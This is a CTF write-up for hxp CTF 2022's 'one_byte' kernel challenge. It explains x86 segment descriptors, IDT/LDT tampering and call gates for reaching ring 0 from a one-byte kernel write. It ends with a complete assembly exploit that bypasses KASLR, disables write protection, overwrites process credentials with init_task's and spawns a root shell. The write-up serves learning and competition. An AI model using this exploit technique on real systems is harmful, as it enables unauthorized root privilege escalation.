hxp CTF 2022: one_byte writeup

In this challenge, you could write one byte to an arbitrary kernel address (even those marked read-only, as long as it is not mapped as executable). This leads to a full compromise of the kernel, even without a KASLR leak.

In a nutshell

KASLR is nice, but doesn’t apply everywhere. You can manipulate either the IDT (before the cpu_entry_area at 0xfffffe0000000000) or LDT (after [modify_ldt]() at 0xffff880000000000), which are mapped read-only at fixed addresses.

Writing to the GDT might also work, but usually there is a context switch after challenge_write returns - and since __switch_to triggers a GDT reload, the write is discarded.

GDT, IDT, LDT, what?

i386 segments are a wonderful feature (“feature”) that are still around in x86_64 but not really used for everyday programming (fs and gs are still around, but work with MSRs now). However, many low-level mechanisms still use them to some extent (e.g. interrupts).

I’ll give a somewhat hand-wavy explanation here; for the actual full details you probably want to study a copy of the Intel SDM (Volume 3A) or AMD Programmer’s Manual (Volume 2). In essence: all of this is a gross oversimplification, so check the manual.

The segment registers cs, ds, es, fs, gs and ss can hold a segment selector. When an instruction references memory through one of those segments, the CPU uses the segment information for additional permissions checks. Segments also have a base address by which each access through the segment is offset by. This was useful in the 16-bit era, when we might have had more memory than what a single 16-bit pointer could actually access. This is why pointers with additional segment information are also known as far pointers.

The CPU keeps the segment descriptors that contain all this information in one of two tables, the Global Descriptor Table (GDT) and the Local Descriptor Table (LDT). The GDT is generally CPU-wide (it holds segments like the kernel’s code and data segments, and the default userspace segments), while the LDT is process-configurable.

The descriptor itself contains information on the segment base and limit, and some additional flags including the descriptor’s privilege level (DPL). For example, for code segments this is the CPL at which the code is allowed to run (depending on some other flags).

The segment selector that is actually stored in the registers is really just an index into one of the corresponding descriptor tables. Bit 2 selects whether this is the (CPU-wide) GDT, or the (per-process) LDT. The low two bits indicate the selector’s privilege level (RPL - this is not the DPL of the actual segment descriptor, nor the current privilege level (CPL)).

Usually, this isn’t too interesting. However, there are also system-segment descriptors that have some additional features. Generally, these are used to support switching to higher privilege levels (e.g. when an interrupt occurs that needs to be handled by kernel code, even though the CPU is currently executing userspace instructions).

For this challenge, there are basically two important types:

  • Trap gates and/or interrupt gates in the IDT tell the CPU where it can find the interrupt handler for that specific interrupt (they differ only in whether they disable interrupts on entry).

  • Call gates in the LDT or GDT are very similar. Instead of being invoked by interrupts, they are invoked manually via a far call (lcall in AT&T syntax).

Both of these types will - if set up correctly - switch the CPL to the DPL of the code segment that is referenced, and allow switching to CPL 0 this way.

If you run into SMAP troubles, you can easily disable SMAP by setting the AC bit in the flags register before switching to CPL 0 - neither of these methods will modify this flag.

Approach 1: Redirecting an interrupt

Since we know where the IDT is, we can move the interrupt entrypoint around by overwriting part of the address that will be called. If there is a useful gadget near the original entrypoint (that we can reach by changing only one byte), we can control where the kernel resumes execution. Normally, the int 0x80 entrypoint is entry_INT80_compat - but we can instead jump into the middle of an instruction to a jmp rdi at entry_INT80_compat+0x17 to transfer control back to a userspace address (remember: while SMAP is enabled, SMEP is disabled).

Approach 2: Call gates

Another way to gain code execution is to set up a call gate in the LDT. Linux allows you to modify the LDT via the modify_ldt syscall, but will filter out call gates. We can register a data segment descriptor with its base and limit set in such a way that if reinterpreted as a call gate, it will call back into our userspace code. Then, we use the one-byte write to set the type field of the descriptor to actually turn it into a call gate. A far call (rather than the int 0x80) will then send execution into userspace code, but running at CPL 0.

CPL 0 shellcoding

At this point, the system is in a bit of a weird state. SMAP is disabled (see above), but we still don’t have full access to kernel code. Here are a few problems and how to fix them:

  • We nede to be able to access per-CPU variables via the gs segment. For this, just use the swapgs instruction.

  • To leak a KASLR address, you can simply read the LSTAR MSR (which contains the entry point for the syscall instruction).

  • Kernel memory is not currently mapped because KPTI is enabled and we are still in the userspace page tables. To switch to the kernel-mode page tables, add 0x1000 to cr3 (read the kernel code in entry_64.S for more info).

  • The current page is most likely not mapped in the kernel page tables, so the previous step will fail. You can disable WP in cr0 and copy your shellcode to the hugepage that contains the syscall entrypoint.

  • Interrupts can cause chaos if they aren’t yet disabled, so use cli to disable them

Then, do your usual kernel exploitation (e.g. setting current->cred), and return to userspace (or not, I guess).

An example exploit

// gcc -no-pie -nostdlib -Wl,--build-id=none -s pwn.S -o pwn

#include <linux/mman.h>
#include <sys/syscall.h>

.pushsection .text.1
.code64
__syscall_64_fail.L:
    negl %eax
    movl $SYS_exit_group, %eax
    syscall
    ud2
.popsection

.macro check_syscall_64 nr:req, res=%rax
    movl \nr, %eax
    syscall
    test \res, \res
    js __syscall_64_fail.L
.endm

.macro var name:req
    .pushsection .data
    .balign 8
    .local \name
    \name:
.endm

.macro endvar name:req
    .local end_\name
    end_\name:
    .eqv sizeof_\name, end_\name - \name
    .popsection
.endm

.macro asciz name:req, data:vararg
    var \name
        .asciz \data
    endvar \name
.endm

.macro far_ptr name:req, selector:req, offset:req
    var \name
        .int \offset
        .short \selector
    endvar \name
.endm

.macro fn name:req
    .text
    .code64
    .global \name
    \name:
.endm

// <*/fcntl.h> are all C-only
#define O_WRONLY 1

// Yes, ordering in kernel and user mode are different, blame AMD/Intel.
#define __KERNEL_CS   (2 * 8)

// For 4-level paging
#define LDT_BASE_ADDR 0xffff880000000000
#define LDT_STRIDE 0x10000
#define PTI_SWITCH_MASK 0x1000

// Arbitrary constants
#define STACK_SIZE 0x80000

// Selectors for the LDT have bit 2 set. Also RPLs
#define LDT_SELECTOR 0b100
#define RPL_KERNEL   0b000
#define RPL_USER     0b011
#define TARGET_ENTRY 12
#define TARGET_SELECTOR ((TARGET_ENTRY << 3) | LDT_SELECTOR | RPL_USER)

// With one descriptor (i.e. a one-byte write): modifiable bits in cs_offset:
//   0x0000000000401000 <- ring0
//   0x00000000ffdfffff
//             |||\___/
//             |||  \____ limit
//             \/\_______ G, D, 0, AV
//              \________ base_addr[31:24]

#define MSR_LSTAR 0xc0000082
#define KASLR_WRITABLE 0xa00000
#define KASLR_LSTAR 0xa00010
#define KASRL_WRITABLE_END 0xc00000
#define KASLR_WRITE_TO 0xbad000
#define KASLR_INIT_TASK 0x1613940
#define PERCPU_CURRENT 0x1fbc0
#define STRUCT_TASK_STRUCT_REAL_CRED 0x0a78
#define STRUCT_TASK_STRUCT_CRED 0x0a80
#define STRUCT_CRED_USAGE 0x0

// TODO: Check that &ring0 == 0x401000
fn ring0
    // Disable interrupts (interrupts cause double faults right now)
    cli

    // Read LSTAR to bypass KASLR
    movl $MSR_LSTAR,  %ecx
    rdmsr
    shlq $32, %rdx
    orq %rax, %rdx
    subq $KASLR_LSTAR, %rdx
    movq %rdx, %rbp

    // Disable WP
    movq %cr0, %r8
    andq $(~(1 << 16)), %r8
    movq %r8, %cr0

    // Copy stage 2 to the mapped kernel entry point
    movq %rbp, %rdi
    addq $KASLR_WRITE_TO, %rdi
    movq %rdi, %r15
    leaq ring0_stage2(%rip), %rsi
    movl $sizeof_ring0_stage2, %ecx
    rep movsb

    // Jump there.
    jmp *%r15

var ring0_stage2
    // Get access to per-cpu variables (current, mostly) via swapgs
    swapgs

    // Get the current page table.
    movq %cr3, %rbx

    // Switch to the kernel page table.
    andq $(~PTI_SWITCH_MASK), %rbx
    movq %rbx, %cr3

    // Set current->cred and current->real_cred to init_task->cred
    addq $KASLR_INIT_TASK, %rdx
    movq STRUCT_TASK_STRUCT_CRED(%rdx), %rdx
    addl $2, STRUCT_CRED_USAGE(%rdx)
    movq %gs:PERCPU_CURRENT, %rax
    movq %rdx, STRUCT_TASK_STRUCT_CRED(%rax)
    movq %rdx, STRUCT_TASK_STRUCT_REAL_CRED(%rax)

    // Swap back
    swapgs

    // Switch the page table back around
    orq $PTI_SWITCH_MASK, %rbx
    movq %rbx, %cr3

    // Build an `iret` stackframe rather than a `ret far` stack frame.
    popq %r8 // => %rip
    popq %r9 // => %cs
    pushfq
    orq $(1 << 9), (%rsp) // Set IF in the new RFLAGS (like sti)
    pushq %r9
    pushq %r8
    iretq
endvar ring0_stage2

var user_desc
    // base2 (base_addr[31:24]) == cs_offset[31:24]
    // limit_in_pages           == cs_offset[23]
    // seg_32bit                == cs_offset[22]
    // NB: Because lm is ignored, cs_offset[21] must be 0
    // useable                  == cs_offset[20]
    // limit1 (limit[19:16])    == cs_offset[19:16]
    // flags0                   == (arbitrary, will be overwritten later)
    // base1 (base_addr[23:16]) == (ignored entirely)
    // base0 (base_addr[15:0])  == __KERNEL_CS
    // limit0 (limit[15:0])     == cs_offset[15:0]
    .int TARGET_ENTRY // entry_number
    .int __KERNEL_CS  // base_addr
    .int 0x01000      // limit
    .int 0b00000001   // flags (int because of padding - only the low byte is actually used)
    //     |||||\/\____  .seg_32bit (D) (must be 1 for set_thread_area)
    //     ||||| \_____  .contents (top 2 bits of type, must be 00 or 01 for set_thread_area)
    //     ||||\_______  .read_exec_only (!R)
    //     |||\________  .limit_in_pages (G)
    //     ||\_________  .seg_not_present (!P)
    //     |\__________  .useable (AV)
    //     \___________  .lm (will be ignored)
endvar user_desc

// On the next descriptor, the CPU wants type == 0 here (or you get a #GP(selector)).
// We can't achieve this without another write, but here's what the values mean.
//     base2 (base_addr[31:24]) == (ignored)
//     flags1                   == (ignored)
//     limit1 (limit[19:16])    == (ignored)
//     flags0                   == (mostly ignored, except for the type)
//     base1 (base_addr[23:16]) == (ignored)
//     base0 (base_addr[15:0])  == cs_offset[63:48]
//     limit0 (limit[15:0])     == cs_offset[47:32]

var high_desc
    // We need a placeholder so that the LDT is long enough (i.e. contains the cleared descriptor
    // above the target descriptor).
    .int TARGET_ENTRY + 2 // entry_number
    .int 0xffff           // base_addr
    .int 0xffff           // limit
    .int 0b00111000       // flags
endvar high_desc

asciz module_path, "/dev/one_byte"
asciz shell_path, "/bin/sh"

var shell_argv
    .quad shell_path
    .quad 0
endvar shell_argv

var module_message
    .quad LDT_BASE_ADDR + LDT_STRIDE + (TARGET_ENTRY * 8) + 5
    .byte 0b11101100
endvar module_message

.macro modify_ldt desc:req
    movl $sizeof_\desc, %edx
    leaq \desc(%rip), %rsi
    movl $0x11, %edi
    check_syscall_64 $SYS_modify_ldt, %eax // Result is zero-extended from 32 bits for weird ABI reasons.
.endm

fn _start
    // Open device
    xorl %edx, %edx
    movl $O_WRONLY, %esi
    leaq module_path(%rip), %rdi
    check_syscall_64 $SYS_open
    movl %eax, %r15d

    // "stac" in CPL3
    pushfq
    orq $(1 << 18), (%rsp)
    popfq

    // Update the LDT
    modify_ldt user_desc
    modify_ldt high_desc

    // Trigger the overwrite
    movl $sizeof_module_message, %edx
    leaq module_message(%rip), %rsi
    movl %r15d, %edi
    check_syscall_64 $SYS_write

    // Go to CPL 0
    far_ptr gate_target, TARGET_SELECTOR, 0xdead8664
    lcall *(gate_target)

    // Get a shell
    leaq shell_path(%rip), %rdi
    leaq shell_argv(%rip), %rsi
    xorl %edx, %edx
    check_syscall_64 $SYS_execve
    exit_64 $0

// vim:syntax=asm: